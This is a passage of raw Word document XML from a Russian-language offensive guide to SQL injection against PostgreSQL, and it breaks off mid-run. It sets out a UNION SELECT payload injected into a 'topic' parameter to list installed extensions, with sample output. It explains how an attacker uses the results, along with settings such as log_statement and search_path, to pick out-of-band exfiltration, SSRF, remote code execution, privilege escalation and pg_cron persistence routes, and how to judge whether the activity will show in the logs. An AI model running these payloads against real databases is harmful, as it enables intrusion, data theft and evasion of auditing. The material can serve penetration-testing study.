        <w:t xml:space="preserve"> → какие расширения активны на уровне postmaster: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(запросы логируются нормализованно),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(audit-логирование, атакующий должен учитывать, что DDL логируется), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_explain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (планы запросов в лог), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (запланированные задачи — потенциальный persistence-вектор).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`log_statement = ddl|mod|all`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → определяет, попадёт ли последующая активность атакующего в лог. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий невидим в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но может остаться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pgaudit.log</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`row_security = on/off`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → если </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(rare в production), RLS отключён глобально → 3.17 не применим, но 3.13/3.8.3 проще.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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 view, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на SELECT. Альтернатива — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_setting('name')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для одной настройки за раз; через UNION с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IN (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пакетом короче.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Полезные дополнительные настройки для отдельных запросов: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current_setting('is_superuser')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'on'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без падения для не-superuser (в отличие от чтения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быстрая проверка, эскалировалась ли роль (нужно после 3.13).</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current_setting('search_path')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → текущий search_path сессии; цель для проверки доступности 3.13.2 hijacking.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current_setting('cluster_name')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → имя кластера, если задано (часто это совпадает с именем приложения — fingerprint).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — `pg_extension` (установленные расширения)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shared_preload_libraries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> из Payload B — это то, что загружено в postmaster.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 то, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">установлено</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в текущей БД (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Разница: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чаще в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shared_preload_libraries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а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pgcrypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — в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Для 3.6 (OOB) и 3.7 (RCE) важно именно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Payload (подставляется вместо `topic`):</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e.oid::int, e.extname || ' v' || e.extversion || ' [schema=' || n.nspname || ']', now() FROM pg_extension e JOIN pg_namespace n ON e.extnamespace = n.oid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published_at FROM posts WHERE topic = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT e.oid::int,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    e.extname || ' v' || e.extversion || ' [schema=' || n.nspname || ']',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    now()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_extension e</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_namespace n ON e.extnamespace = n.oid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title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все extension-ы:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">plpgsql v1.0 [schema=pg_catalog]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stat_statements v1.10 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgcrypto v1.3 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dblink v1.2 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres_fdw v1.1 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hstore v1.8 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uuid-ossp v1.1 [schema=public]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что атакующий из этого извлекает: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 3.6.1 применим (OOB через DNS/TCP).</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 3.6.2 применим (SSRF).</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 3.7.2/3.7.3 применимы (RCE через языковые функции).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(trusted) + кластер на PG &lt; 17.1/16.5/15.9/14.14/13.17 → CVE-2024-10979 (R7) применима.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pg_cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → persistence через scheduled jobs (вне scope раздела 3, но полезный сигнал).</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pgcrypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → доступны </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crypt()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gen_random_bytes()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для оффлайн-операций, но также используется для проверки md5/SCRAM хешей — пригодится в chain с 3.8.3 Payload B.</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Версия extension (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">extversion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — для security-проверок самих extension-ов (например,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1.0 имел известные NTLM-coercion баги на старых PG).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Также полезно сразу проверить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">доступные</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> extension (не только установленные) через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_available_extensions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если в нём есть строки с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">installed_version IS NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, атакующий после superuser-эскалации может их доставить (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION dblink</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собирает полную карту того, что в кластере доступно и применимо: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Точная версия (major.minor) + дистрибуция + ОС</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → выбор применимых CVE из раздела 4. Один запрос — десятки исключённых из дальнейших попыток векторов (нет смысла пробовать CVE-2024-10979, если кластер 16.5+).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Пути конфигов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → следующий шаг 3.6.3 без угадывания дистрибуции.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`shared_preload_libraries` и `log_statement`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → ожидаемая видимость в логах; решение, насколько громко вести себя на следующих шагах.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`pg_extension`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → бинарное решение, применимы ли категории 3.6.1, 3.6.2, 3.7.2, 3.7.3. Если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отсутствует и роль не superuser — OOB-вектор закрыт, надо искать другой.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`row_security`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → нужно ли вообще обходить RLS (3.17) или его нет.</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 built-in функция, возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'PostgreSQL ' || server_version || ' on ' || system_type || ', compiled by ' || compiler ', 64-bit'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Никаких прав не требует. Часть строки про дистрибуцию вшивается на этапе сборки пакета и не настраивается без пересборки.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 view, формируемый рантайм-обходом всех GUC. SELECT на view выдан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Скрытие значений для не-привилегированных ролей применяется к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">конкретным</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> настройкам (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
